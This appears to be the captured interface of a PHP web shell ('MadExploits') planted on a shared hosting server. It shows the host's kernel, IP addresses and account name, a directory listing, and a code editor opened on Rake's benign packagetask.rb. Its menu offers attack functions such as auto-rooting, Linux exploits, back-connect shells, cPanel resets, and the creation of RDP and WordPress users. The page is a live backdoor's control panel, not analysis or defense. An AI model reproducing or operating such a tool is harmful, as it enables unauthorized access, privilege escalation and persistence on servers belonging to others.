Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby22 /
lib64 /
ruby /
2.2.0 /
rake /
[ HOME SHELL ]
Name
Size
Permission
Action
contrib
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
loaders
[ DIR ]
drwxr-xr-x
alt_system.rb
3.17
KB
-rw-r--r--
application.rb
23.14
KB
-rw-r--r--
backtrace.rb
868
B
-rw-r--r--
clean.rb
1.93
KB
-rw-r--r--
cloneable.rb
418
B
-rw-r--r--
cpu_counter.rb
2.83
KB
-rw-r--r--
default_loader.rb
235
B
-rw-r--r--
dsl_definition.rb
5.64
KB
-rw-r--r--
early_time.rb
340
B
-rw-r--r--
file_creation_task.rb
670
B
-rw-r--r--
file_list.rb
12.13
KB
-rw-r--r--
file_task.rb
1.26
KB
-rw-r--r--
file_utils.rb
3.66
KB
-rw-r--r--
file_utils_ext.rb
4.05
KB
-rw-r--r--
gempackagetask.rb
144
B
-rw-r--r--
invocation_chain.rb
1.16
KB
-rw-r--r--
invocation_exception_mixin.rb
431
B
-rw-r--r--
late_time.rb
265
B
-rw-r--r--
linked_list.rb
2.27
KB
-rw-r--r--
multi_task.rb
315
B
-rw-r--r--
name_space.rb
673
B
-rw-r--r--
packagetask.rb
5.28
KB
-rw-r--r--
pathmap.rb
53
B
-rw-r--r--
phony.rb
351
B
-rw-r--r--
private_reader.rb
364
B
-rw-r--r--
promise.rb
2.28
KB
-rw-r--r--
pseudo_status.rb
375
B
-rw-r--r--
rake_module.rb
770
B
-rw-r--r--
rake_test_loader.rb
341
B
-rw-r--r--
rdoctask.rb
153
B
-rw-r--r--
ruby182_test_unit_fix.rb
897
B
-rw-r--r--
rule_recursion_overflow_error....
353
B
-rw-r--r--
runtest.rb
594
B
-rw-r--r--
scope.rb
882
B
-rw-r--r--
task.rb
11.02
KB
-rw-r--r--
task_argument_error.rb
119
B
-rw-r--r--
task_arguments.rb
2.15
KB
-rw-r--r--
task_manager.rb
8.84
KB
-rw-r--r--
tasklib.rb
618
B
-rw-r--r--
testtask.rb
5.55
KB
-rw-r--r--
thread_history_display.rb
1.11
KB
-rw-r--r--
thread_pool.rb
4.78
KB
-rw-r--r--
trace_output.rb
543
B
-rw-r--r--
version.rb
156
B
-rw-r--r--
win32.rb
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : packagetask.rb
# Define a package task library to aid in the definition of # redistributable package files. require 'rake' require 'rake/tasklib' module Rake # Create a packaging task that will package the project into # distributable files (e.g zip archive or tar files). # # The PackageTask will create the following targets: # # +:package+ :: # Create all the requested package files. # # +:clobber_package+ :: # Delete all the package files. This target is automatically # added to the main clobber target. # # +:repackage+ :: # Rebuild the package files from scratch, even if they are not out # of date. # # <tt>"<em>package_dir</em>/<em>name</em>-<em>version</em>.tgz"</tt> :: # Create a gzipped tar package (if <em>need_tar</em> is true). # # <tt>"<em>package_dir</em>/<em>name</em>-<em>version</em>.tar.gz"</tt> :: # Create a gzipped tar package (if <em>need_tar_gz</em> is true). # # <tt>"<em>package_dir</em>/<em>name</em>-<em>version</em>.tar.bz2"</tt> :: # Create a bzip2'd tar package (if <em>need_tar_bz2</em> is true). # # <tt>"<em>package_dir</em>/<em>name</em>-<em>version</em>.zip"</tt> :: # Create a zip package archive (if <em>need_zip</em> is true). # # Example: # # Rake::PackageTask.new("rake", "1.2.3") do |p| # p.need_tar = true # p.package_files.include("lib/**/*.rb") # end # class PackageTask < TaskLib # Name of the package (from the GEM Spec). attr_accessor :name # Version of the package (e.g. '1.3.2'). attr_accessor :version # Directory used to store the package files (default is 'pkg'). attr_accessor :package_dir # True if a gzipped tar file (tgz) should be produced (default is # false). attr_accessor :need_tar # True if a gzipped tar file (tar.gz) should be produced (default # is false). attr_accessor :need_tar_gz # True if a bzip2'd tar file (tar.bz2) should be produced (default # is false). attr_accessor :need_tar_bz2 # True if a zip file should be produced (default is false) attr_accessor :need_zip # List of files to be included in the package. attr_accessor :package_files # Tar command for gzipped or bzip2ed archives. The default is 'tar'. attr_accessor :tar_command # Zip command for zipped archives. The default is 'zip'. attr_accessor :zip_command # Create a Package Task with the given name and version. Use +:noversion+ # as the version to build a package without a version or to provide a # fully-versioned package name. def initialize(name=nil, version=nil) init(name, version) yield self if block_given? define unless name.nil? end # Initialization that bypasses the "yield self" and "define" step. def init(name, version) @name = name @version = version @package_files = Rake::FileList.new @package_dir = 'pkg' @need_tar = false @need_tar_gz = false @need_tar_bz2 = false @need_zip = false @tar_command = 'tar' @zip_command = 'zip' end # Create the tasks defined by this task library. def define fail "Version required (or :noversion)" if @version.nil? @version = nil if :noversion == @version desc "Build all the packages" task :package desc "Force a rebuild of the package files" task :repackage => [:clobber_package, :package] desc "Remove package products" task :clobber_package do rm_r package_dir rescue nil end task :clobber => [:clobber_package] [ [need_tar, tgz_file, "z"], [need_tar_gz, tar_gz_file, "z"], [need_tar_bz2, tar_bz2_file, "j"] ].each do |(need, file, flag)| if need task :package => ["#{package_dir}/#{file}"] file "#{package_dir}/#{file}" => [package_dir_path] + package_files do chdir(package_dir) do sh @tar_command, "#{flag}cvf", file, package_name end end end end if need_zip task :package => ["#{package_dir}/#{zip_file}"] file "#{package_dir}/#{zip_file}" => [package_dir_path] + package_files do chdir(package_dir) do sh @zip_command, "-r", zip_file, package_name end end end directory package_dir_path => @package_files do @package_files.each do |fn| f = File.join(package_dir_path, fn) fdir = File.dirname(f) mkdir_p(fdir) unless File.exist?(fdir) if File.directory?(fn) mkdir_p(f) else rm_f f safe_ln(fn, f) end end end self end # The name of this package def package_name @version ? "#{@name}-#{@version}" : @name end # The directory this package will be built in def package_dir_path "#{package_dir}/#{package_name}" end # The package name with .tgz added def tgz_file "#{package_name}.tgz" end # The package name with .tar.gz added def tar_gz_file "#{package_name}.tar.gz" end # The package name with .tar.bz2 added def tar_bz2_file "#{package_name}.tar.bz2" end # The package name with .zip added def zip_file "#{package_name}.zip" end end end
Close